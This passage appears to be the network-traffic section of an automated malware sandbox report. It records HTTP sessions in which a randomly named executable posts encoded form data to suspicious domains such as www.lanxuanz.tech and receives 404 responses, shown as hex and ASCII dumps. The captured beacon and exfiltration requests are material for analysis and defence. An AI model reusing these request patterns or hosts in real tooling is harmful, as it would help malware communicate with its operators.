                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    47192.168.2.549759144.34.186.85804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:59:54.003180981 CEST1777OUTPOST /ni9w/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.h5hph710am.site
                                                                                                                    Origin: http://www.h5hph710am.site
                                                                                                                    Referer: http://www.h5hph710am.site/ni9w/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 78 54 79 79 6e 4e 4d 6f 31 49 53 70 32 61 59 42 67 57 70 34 6a 38 54 30 50 53 73 67 50 37 2b 4d 2b 6a 6c 4d 48 4f 79 37 6d 6f 63 48 64 36 4d 43 69 6e 6e 55 31 2b 77 41 53 69 36 6d 67 39 30 35 51 49 63 74 6e 64 64 78 7a 74 49 41 50 56 59 42 41 47 67 68 42 5a 34 2b 57 56 44 48 31 4d 33 65 30 57 73 76 75 44 31 72 4f 54 49 56 38 43 63 6d 31 65 39 72 50 6a 6f 41 31 78 76 65 36 53 70 38 70 6c 70 37 70 43 50 78 70 6e 6c 50 47 4e 61 64 50 67 45 68 71 54 49 33 53 65 65 4b 35 61 46 6b 65 4d 2f 35 5a 6a 7a 50 35 6f 6c 38 31 71 34 4d 6e 5a 4e 4a 70 52 70 46 55 59 78 44 34 30 6a 64 48 44 6a 65 75 54 45 58 75 42 35 4b 79 53 56 6e 56 52 77 4a 53 74 36 6b 62 48 62 68 30 45 59 59 35 53 5a 47 53 7a 33 33 36 61 49 70 6a 50 69 56 71 56 74 30 71 32 6e 32 48 61 78 45 6b 6d 4f 74 63 32 7a 36 43 36 70 6f 6c 6b 37 61 73 44 78 53 36 79 47 7a 37 6e 39 76 71 6a 51 5a 47 62 53 4e 69 52 6b 2f 30 76 63 42 76 72 70 78 64 72 76 6c 77 63 4b 6b 2f 41 55 38 79 50 41 32 76 57 61 34 47 38 51 44 7a 72 6c 7a 67 [TRUNCATED]
                                                                                                                    Data Ascii: FbuX5DnP=xTyynNMo1ISp2aYBgWp4j8T0PSsgP7+M+jlMHOy7mocHd6MCinnU1+wASi6mg905QIctnddxztIAPVYBAGghBZ4+WVDH1M3e0WsvuD1rOTIV8Ccm1e9rPjoA1xve6Sp8plp7pCPxpnlPGNadPgEhqTI3SeeK5aFkeM/5ZjzP5ol81q4MnZNJpRpFUYxD40jdHDjeuTEXuB5KySVnVRwJSt6kbHbh0EYY5SZGSz336aIpjPiVqVt0q2n2HaxEkmOtc2z6C6polk7asDxS6yGz7n9vqjQZGbSNiRk/0vcBvrpxdrvlwcKk/AU8yPA2vWa4G8QDzrlzga112Z+Rx2V+cyOXm/vzWnUjPj8gaHWwhyVk4BcqSmBQFIkzESynlHO2/kEjiSqRu3mGR8xlWdWGSs9SCOdA2+I6gVhFaA0gCAVwL1dtg+TdeTMoA1qCAPl71dS/egvCuvWGGptWyNdh2WHsyvU1UN4y31ZEPqoBpRBRuiXxnfme3tJhRrDKYDHC87ji7y/Ayn5pUDGYpS+D0fro+5mjZZwxAePuT4Nzazqum3mOS4acQyXdk9D2FpQwZfok/Dk4PZ/QIuzCxn5zMAE1it629o+LMqr4xJVe40XdlbEjDsGnZkgGFbFcGseMPtZuaC65zDY5w55/k1ACrhXoZGAqNLogT+TTH2iRo6BxU3hPRxMkzkpoHbqJ9T5zdxLKpx5y1C320k96Da333ehXaEDaF7jsownsZVswDvn+EsuC510ml8xq4wil8uKuZNUkPmmOr5ZJnpG/k2gaAuB+HCA3kPva3ArQ80JOwNYn53C9MGewwze12TMl8l69d3W/SoEin3BnEj564Kx5gbRpSkLrWwfe5NpS/6FDOL1+11a0HNjluv4ukcCKuyEclJCa4inykEdKIaDk+FfnVOlLVMEgPGXRhqzR5MlCG8YjccZwvmx7i6OMadgrf9E96tdz8QtfGihm6Hec6SWEhTWA+j081TOwtGkvKC9n/UH [TRUNCATED]
                                                                                                                    Sep 30, 2024 19:59:54.593997002 CEST720INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.0
                                                                                                                    Date: Mon, 30 Sep 2024 17:59:54 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Content-Length: 555
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    48192.168.2.549760144.34.186.85804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 19:59:56.545656919 CEST476OUTGET /ni9w/?FbuX5DnP=8RaSk5tWi66Sq48MhHZUoNqLIlgjLo7w7AJBRYL2j4srPIRV3wjO+oo3VCeYgIIWRIVLwvpyy/VAIW0MNnFhP5IMZ0bC4qCM9jFMkTpJYlgGjxgR3domNTZU3RfMxSMm9A==&2Zv0=qtmpl4wh HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Host: www.h5hph710am.site
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Sep 30, 2024 19:59:57.106379032 CEST720INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.0
                                                                                                                    Date: Mon, 30 Sep 2024 17:59:57 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Content-Length: 555
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    49192.168.2.549761136.143.186.12804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 20:00:02.520931959 CEST734OUTPOST /1q08/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 209
                                                                                                                    Host: www.lanxuanz.tech
                                                                                                                    Origin: http://www.lanxuanz.tech
                                                                                                                    Referer: http://www.lanxuanz.tech/1q08/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 70 54 4d 31 7a 65 52 32 53 6a 69 70 62 31 35 63 6a 34 75 66 66 70 58 43 35 4a 78 73 6f 62 79 4d 33 71 79 68 39 76 37 41 4b 6d 35 70 6e 42 50 53 4a 56 64 50 4d 4d 43 6b 61 49 78 75 62 67 44 78 6a 77 33 67 4d 56 73 35 48 6e 53 37 50 31 62 4b 32 39 6a 30 38 79 62 76 61 4d 35 63 51 50 4a 67 44 78 45 61 4b 65 44 53 78 71 63 54 36 63 31 76 47 2b 33 4d 4e 79 76 43 34 58 72 52 65 61 38 32 79 56 71 55 54 5a 5a 75 4b 34 2f 75 36 61 41 67 36 5a 4c 30 6e 7a 37 63 44 4d 55 6e 71 70 59 2f 48 37 65 4c 72 4c 63 49 5a 46 56 35 5a 5a 51 79 62 4a 69 5a 31 6d 34 68 66 50 6f 50 36 4d 51 6d 38 61 6d 72 78 64 30 3d
                                                                                                                    Data Ascii: FbuX5DnP=pTM1zeR2Sjipb15cj4uffpXC5JxsobyM3qyh9v7AKm5pnBPSJVdPMMCkaIxubgDxjw3gMVs5HnS7P1bK29j08ybvaM5cQPJgDxEaKeDSxqcT6c1vG+3MNyvC4XrRea82yVqUTZZuK4/u6aAg6ZL0nz7cDMUnqpY/H7eLrLcIZFV5ZZQybJiZ1m4hfPoP6MQm8amrxd0=
                                                                                                                    Sep 30, 2024 20:00:03.140939951 CEST1236INHTTP/1.1 404
                                                                                                                    Server: ZGS
                                                                                                                    Date: Mon, 30 Sep 2024 18:00:03 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: zalb_8ae64e9492=346483e803ff107bf3906cbcefa288fe; Path=/
                                                                                                                    Set-Cookie: csrfc=502372df-60e1-4a89-9609-263b54d1aec4;path=/;priority=high
                                                                                                                    Set-Cookie: _zcsr_tmp=502372df-60e1-4a89-9609-263b54d1aec4;path=/;SameSite=Strict;priority=high
                                                                                                                    Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                    vary: accept-encoding
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 35 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 00 cd 58 5b 6f db 36 14 7e df af 60 15 b4 68 b1 28 92 25 2b 76 15 d9 c5 96 0c c5 9e 3a a0 03 86 0d 7b a1 25 ca 22 42 91 02 49 c7 4e 82 fd f7 1d 52 b2 ad 6b 93 f5 69 76 03 8b e2 b9 f1 7c df 39 24 9b bc b9 fb 72 fb fb 9f bf fd 82 0a 5d b2 f5 0f 49 fd 83 10 4a 0a 82 33 fb 64 06 25 d1 18 71 5c 92 95 23 c5 46 68 e5 a0 54 70 4d b8 5e 39 5c 50 9e 91 c3 25 e2 22 17 8c 89 bd 79 c2 32 2d e8 03 31 8f 8a d3 aa 22 da 41 de c9 9c a6 9a 91 f5 5f a2 10 89 57 3f 1f 67 18 e5 f7 48 3f 56 e0 48 93 83 f6 52 05 ae 24 61 2b 47 e9 47 46 54 41 8c a5 42 92 7c e5 78 7b b2 c9 21 0a f5 29 c7 25 65 8f ab 2f 15 e1 3f 7e c5 5c c5 73 df bf bc f6 7d e7 64 d7 6a 1f 47 f0 d9 88 ec f1 f9 3c 84 8f b1 e4 d6 86 62 c7 58 42 c6 92 73 89 14 fc b8 8a 48 9a df 0c 15 14 7d 22 f1 6c 56 1d ba 73 25 96 5b ca 63 1f de a3 ce 44 85 b3 8c f2 ed c8 cc 06 a7 f7 5b 29 76 3c 73 53 c1 84 8c 2f f2 c8 7c 5b 86 ff 39 3f 5e 69 51 dd 1a 31 f5 3c 61 25 46 6e 29 9e 5c 48 28 c1 d2 dd 4a 9c 51 80 eb 3d 23 b9 be 44 17 b9 3f [TRUNCATED]
                                                                                                                    Data Ascii: 56fX[o6~`h(%+v:{%"BINRkiv|9$r]IJ3d%q\#FhTpM^9\P%"y2-1"A_W?gH?VHR$a+GGFTAB|x{!)%e/?~\s}djG<bXBsH}"lVs%[cD[)v<sS/|[9?^iQ1<a%Fn)\H(JQ=#D?_Euu,Xyo?LSt7Ba6%?DvL1)R{7V</fKOsN{vPc}0@J0|-NeNt$E+Ca^uK0gE,0][`Zn~.^D %cT,#|K1{Q;,1oz&j5#ZIdZA@OXU0_Qcq&?!S
                                                                                                                    Sep 30, 2024 20:00:03.140964031 CEST723INData Raw: c4 9a 5a 58 38 05 97 29 f2 ef 81 e3 55 a0 be 94 ef ab 5a 00 f6 d9 e7 e9 9c c0 6c 7b 93 6b ab 67 c2 34 cd ba d3 f4 2c 34 dd c7 f4 f0 bb 68 4a df 6a 53 9e 8b 89 32 b1 09 9f 4f 97 da 49 1f 31 8a fa 36 da b0 5f 7f 03 32 c3 56 c0 ad 37 cd a8 02 6d 73
                                                                                                                    Data Ascii: ZX8)UZl{kg4,4hJjS2OI16_2V7msr$0Njq{}7Mpa [^Xw7)fGL6n0WE5<5-VI0F#)514csjq\GQ=uwOS{<,GrK


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    50192.168.2.549762136.143.186.12804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 20:00:05.067574978 CEST754OUTPOST /1q08/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 229
                                                                                                                    Host: www.lanxuanz.tech
                                                                                                                    Origin: http://www.lanxuanz.tech
                                                                                                                    Referer: http://www.lanxuanz.tech/1q08/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 70 54 4d 31 7a 65 52 32 53 6a 69 70 62 56 70 63 76 2f 43 66 49 5a 58 42 31 70 78 73 2b 72 79 49 33 71 75 68 39 75 50 71 4b 31 64 70 70 44 6e 53 4f 6e 31 50 4c 4d 43 6b 56 6f 78 72 56 41 44 32 6a 77 72 6f 4d 58 34 35 48 6e 32 37 50 30 4c 4b 32 4b 2f 37 39 69 62 70 57 73 35 65 4e 2f 4a 67 44 78 45 61 4b 65 58 34 78 71 45 54 36 74 46 76 46 61 6a 50 4f 79 76 46 39 6e 72 52 61 61 38 79 79 56 71 36 54 59 45 4a 4b 2b 7a 75 36 65 4d 67 35 4d 72 33 75 7a 37 53 63 63 56 53 71 35 4a 41 46 72 61 38 76 49 74 70 4f 43 78 34 52 50 39 59 42 72 71 78 6d 47 55 5a 50 63 67 34 72 38 78 50 6d 35 32 62 76 4b 67 4b 5a 67 30 75 30 30 54 67 53 59 79 62 37 32 35 73 4a 69 4d 43
                                                                                                                    Data Ascii: FbuX5DnP=pTM1zeR2SjipbVpcv/CfIZXB1pxs+ryI3quh9uPqK1dppDnSOn1PLMCkVoxrVAD2jwroMX45Hn27P0LK2K/79ibpWs5eN/JgDxEaKeX4xqET6tFvFajPOyvF9nrRaa8yyVq6TYEJK+zu6eMg5Mr3uz7SccVSq5JAFra8vItpOCx4RP9YBrqxmGUZPcg4r8xPm52bvKgKZg0u00TgSYyb725sJiMC
                                                                                                                    Sep 30, 2024 20:00:05.664117098 CEST1236INHTTP/1.1 404
                                                                                                                    Server: ZGS
                                                                                                                    Date: Mon, 30 Sep 2024 18:00:05 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: zalb_8ae64e9492=cd858cf068bec389eea549b00143a3a9; Path=/
                                                                                                                    Set-Cookie: csrfc=7eed4975-6130-49bc-87d4-749b053c45db;path=/;priority=high
                                                                                                                    Set-Cookie: _zcsr_tmp=7eed4975-6130-49bc-87d4-749b053c45db;path=/;SameSite=Strict;priority=high
                                                                                                                    Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                    vary: accept-encoding
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 35 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 00 cd 58 5b 6f db 36 14 7e df af 60 15 b4 68 b1 28 92 25 2b 76 15 d9 c5 96 0c c5 9e 3a a0 03 86 0d 7b a1 25 ca 22 42 91 02 49 c7 4e 82 fd f7 1d 52 b2 ad 6b 93 f5 69 76 03 8b e2 b9 f1 7c df 39 24 9b bc b9 fb 72 fb fb 9f bf fd 82 0a 5d b2 f5 0f 49 fd 83 10 4a 0a 82 33 fb 64 06 25 d1 18 71 5c 92 95 23 c5 46 68 e5 a0 54 70 4d b8 5e 39 5c 50 9e 91 c3 25 e2 22 17 8c 89 bd 79 c2 32 2d e8 03 31 8f 8a d3 aa 22 da 41 de c9 9c a6 9a 91 f5 5f a2 10 89 57 3f 1f 67 18 e5 f7 48 3f 56 e0 48 93 83 f6 52 05 ae 24 61 2b 47 e9 47 46 54 41 8c a5 42 92 7c e5 78 7b b2 c9 21 0a f5 29 c7 25 65 8f ab 2f 15 e1 3f 7e c5 5c c5 73 df bf bc f6 7d e7 64 d7 6a 1f 47 f0 d9 88 ec f1 f9 3c 84 8f b1 e4 d6 86 62 c7 58 42 c6 92 73 89 14 fc b8 8a 48 9a df 0c 15 14 7d 22 f1 6c 56 1d ba 73 25 96 5b ca 63 1f de a3 ce 44 85 b3 8c f2 ed c8 cc 06 a7 f7 5b 29 76 3c 73 53 c1 84 8c 2f f2 c8 7c 5b 86 ff 39 3f 5e 69 51 dd 1a 31 f5 3c 61 25 46 6e 29 9e 5c 48 28 c1 d2 dd 4a 9c 51 80 eb 3d 23 b9 be 44 17 b9 3f [TRUNCATED]
                                                                                                                    Data Ascii: 56fX[o6~`h(%+v:{%"BINRkiv|9$r]IJ3d%q\#FhTpM^9\P%"y2-1"A_W?gH?VHR$a+GGFTAB|x{!)%e/?~\s}djG<bXBsH}"lVs%[cD[)v<sS/|[9?^iQ1<a%Fn)\H(JQ=#D?_Euu,Xyo?LSt7Ba6%?DvL1)R{7V</fKOsN{vPc}0@J0|-NeNt$E+Ca^uK0gE,0][`Zn~.^D %cT,#|K1{Q;,1oz&j5#ZIdZA@OXU0_Qcq&?!S
                                                                                                                    Sep 30, 2024 20:00:05.664731026 CEST723INData Raw: c4 9a 5a 58 38 05 97 29 f2 ef 81 e3 55 a0 be 94 ef ab 5a 00 f6 d9 e7 e9 9c c0 6c 7b 93 6b ab 67 c2 34 cd ba d3 f4 2c 34 dd c7 f4 f0 bb 68 4a df 6a 53 9e 8b 89 32 b1 09 9f 4f 97 da 49 1f 31 8a fa 36 da b0 5f 7f 03 32 c3 56 c0 ad 37 cd a8 02 6d 73
                                                                                                                    Data Ascii: ZX8)UZl{kg4,4hJjS2OI16_2V7msr$0Njq{}7Mpa [^Xw7)fGL6n0WE5<5-VI0F#)514csjq\GQ=uwOS{<,GrK


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    51192.168.2.549763136.143.186.12804508C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Sep 30, 2024 20:00:07.612725973 CEST1771OUTPOST /1q08/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Length: 1245
                                                                                                                    Host: www.lanxuanz.tech
                                                                                                                    Origin: http://www.lanxuanz.tech
                                                                                                                    Referer: http://www.lanxuanz.tech/1q08/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                                                                    Data Raw: 46 62 75 58 35 44 6e 50 3d 70 54 4d 31 7a 65 52 32 53 6a 69 70 62 56 70 63 76 2f 43 66 49 5a 58 42 31 70 78 73 2b 72 79 49 33 71 75 68 39 75 50 71 4b 31 56 70 70 79 48 53 4e 42 39 50 4b 4d 43 6b 4c 34 78 71 56 41 43 71 6a 77 6a 73 4d 58 30 48 48 6c 2b 37 50 57 54 4b 2f 65 4c 37 30 69 62 70 59 38 35 66 51 50 4a 51 44 78 55 65 4b 65 48 34 78 71 45 54 36 76 64 76 54 2b 33 50 42 53 76 43 34 58 72 6e 65 61 38 61 79 56 69 4d 54 62 70 2b 4c 4f 54 75 39 2b 63 67 70 6f 4c 33 68 7a 36 30 64 63 56 4b 71 35 46 68 46 72 57 4b 76 4a 5a 50 4f 45 42 34 43 2b 4d 42 54 71 57 70 35 6e 45 35 4c 72 73 4b 30 35 68 36 70 2f 32 36 72 35 51 53 52 53 64 46 2b 52 2f 6e 53 61 54 46 34 58 73 32 4a 31 31 70 55 61 76 73 39 6d 6e 4f 51 58 77 32 62 6c 50 52 73 32 42 4a 62 4e 47 49 44 4b 6e 55 79 71 33 35 50 38 41 75 6a 45 30 47 6b 69 4d 62 2f 37 45 6d 51 76 63 78 4c 54 61 79 30 6d 4e 71 52 45 79 4b 6e 61 63 58 75 30 64 71 74 63 74 65 76 77 55 5a 47 73 41 77 4a 53 78 78 4d 45 62 66 69 48 55 7a 2f 6b 50 55 62 73 6c 4d 6e 36 36 4d 6f [TRUNCATED]
                                                                                                                    Data Ascii: 